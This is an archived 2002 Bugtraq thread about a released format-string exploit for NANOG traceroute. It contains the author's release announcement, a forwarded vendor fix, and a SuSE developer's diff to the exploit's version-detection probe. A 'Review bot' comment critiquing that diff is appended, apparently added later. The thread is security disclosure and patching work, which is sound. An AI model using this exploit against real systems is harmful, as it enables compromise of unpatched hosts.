8761593 2002-07-21 14:09 +0200  /14 lines/ SpaceWalker <spacewalker@minithins.net>
Sent by: joel@lysator.liu.se
Imported: 2002-07-23  00:12  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <23174>
Subject: Nanog traceroute format string exploit.
------------------------------------------------------------
From: SpaceWalker <spacewalker@minithins.net>
To: bugtraq@securityfocus.com
Cc: vuln-dev@securityfocus.com
Message-ID: <20020721140924.2584c3cf.spacewalker@minithins.net>

Hello,

As the vulnerability was published some weeks ago, and no working
exploit has been released (the perl exploit was a joke), I decided to
release my private exploit.  I do it only because:
- This exploit will never be used to haxor something because I never
  saw this traceroute used by default.
- This exploit finds offsets "by the proper way" and doesn't place the
  target addresses in the format string (and is interesting to study
  for beginners).

Have phun, please don't haxor with it.
SpaceWalker
(8761593) /SpaceWalker <spacewalker@minithins.net>/(Reflowed)
Attachment (application/octet-stream) in text 8761594
Comment in text 8766598 by Ryan Mansager <rmger@nrez.net>
Comment in text 8769890 by Olaf Kirch <okir@suse.de>
8761594 2002-07-21 14:09 +0200  /16 lines/ SpaceWalker <spacewalker@minithins.net>
Attachment filename: "tracerouteexp.tgz"
Imported: 2002-07-23  00:12  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <23175>
Attachment (text/plain) to text 8761593
Subject: Attachment (tracerouteexp.tgz) to: Nanog traceroute format string exploit.
------------------------------------------------------------
(8761594) /SpaceWalker <spacewalker@minithins.net>/(Reflowed)
8766598 2002-07-23 16:01 -0700  /34 lines/ Ryan Mansager <rmger@nrez.net>
Sent by: joel@lysator.liu.se
Imported: 2002-07-24  01:05  by Brevbäraren
External recipient: SpaceWalker <spacewalker@minithins.net>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <23198>
Comment on text 8761593 by SpaceWalker <spacewalker@minithins.net>
Subject: Re: Nanog traceroute format string exploit.
------------------------------------------------------------
From: Ryan Mansager <rmger@nrez.net>
To: SpaceWalker <spacewalker@minithins.net>
Cc: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Message-ID: <20020723230136.GA69546@beau.nrez.net>


----- Forwarded message from Ehud gavron <gavron@wetwork.net> -----

From: Ehud gavron <gavron@wetwork.net>
Subject: New NANOG traceroute (fixes -T compromise)
To: nanog@merit.edu
Date: Tue, 23 Jul 2002 15:03:34 -0700
Organization: WetWork


The new NANOG traceroute (also known as TrACESroute)
is now available.  It fixes the latest "security" compromise
detailed on Bugtraq and on SUSE security focus at
http://online.securityfocus.com/advisories/2740

Ehud Gavron
gavron@wetwork.net

Directory:
ftp://ftp.login.com/pub/software/traceroute/beta/

Code:
ftp://ftp.login.com/pub/software/traceroute/beta/traceroute.c

Directions:
ftp://ftp.login.com/pub/software/traceroute/beta/0_readme.txt
(8766598) /Ryan Mansager <rmger@nrez.net>/----------
8769890 2002-07-24 14:43 +0200  /26 lines/ Olaf Kirch <okir@suse.de>
Sent by: joel@lysator.liu.se
Imported: 2002-07-24  20:35  by Brevbäraren
External recipient: SpaceWalker <spacewalker@minithins.net>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <23209>
Comment on text 8761593 by SpaceWalker <spacewalker@minithins.net>
Subject: Re: Nanog traceroute format string exploit.
------------------------------------------------------------
From: Olaf Kirch <okir@suse.de>
To: SpaceWalker <spacewalker@minithins.net>
Cc: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Message-ID: <20020724144310.F7080@suse.de>

On Sun, Jul 21, 2002 at 02:09:24PM +0200, SpaceWalker wrote:
> -This exploit will never be used to haxor something because I never
> saw this traceroute used by default

Well, SuSE has been using Nanog traceroute for ages; at least
since 7.0 but probably longer.

OTOH, the bug isn't very new either.  The nkitb package in SuSE Linux
7.0 has a patch for this vulnerability dated 2000/10/03 14:12:43.

Finally, let me remark that your exploit has a minor bug in detecting
vulnerable versions. Using the attached patch it will properly
recognize patched versions of traceroute :)

Cheers
Olaf
-- 
Olaf Kirch     |  Anyone who has had to work with X.509 has probably
okir@suse.de   |  experienced what can best be described as
---------------+  ISO water torture. -- Peter Gutmann
(8769890) /Olaf Kirch <okir@suse.de>/---------------
Attachment (text/plain) in text 8769891
8769891 2002-07-24 14:43 +0200  /12 lines/ Olaf Kirch <okir@suse.de>
Imported: 2002-07-24  20:35  by Brevbäraren
External recipient: SpaceWalker <spacewalker@minithins.net>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <23210>
Attachment (text/plain) to text 8769890
Subject: Attachment to: Re: Nanog traceroute format string exploit.
------------------------------------------------------------
--- main.c	Wed Jul 24 14:41:38 2002
+++ tracerouteexp/main.c	Sun Jul 21 14:04:48 2002
@@ -266,7 +266,7 @@
 	readbuf[lus]=0;
 	if(insaneverbose)
 		printf("*** result of  first try : %s\n",readbuf);
-	if(strstr(readbuf,"%x%x%x%x")){
+	if(strstr(readbuf,"%x%x%x%x%x")){
 		printf("*** fatal : This version is patched\n");
 		exit(-1);
 		}
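Review bot: the hunk's direction is inverted relative to its stated purpose: the `---` header is `main.c` dated Wed Jul 24 (the corrected copy) and the `+++` header is `tracerouteexp/main.c` dated Sun Jul 21 (the file from the tarball), so the hunk as written changes `"%x%x%x%x"` into `"%x%x%x%x%x"`, and `patch -p0` run against the original will not find the `-` line and will either reject the hunk or ask to apply it reversed; regenerate it with the original file first (`diff -u tracerouteexp/main.c main.c`) or tell readers to apply it with `patch -R`. Two smaller points on the same lines: the patched-version test is a bare `strstr` for one fixed probe, so any reply that truncates or reformats the echoed probe is silently classified as unpatched, and `exit(-1)` produces exit status 255 where `exit(1)` is the conventional fatal-error status.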
(8769891) /Olaf Kirch <okir@suse.de>/---------------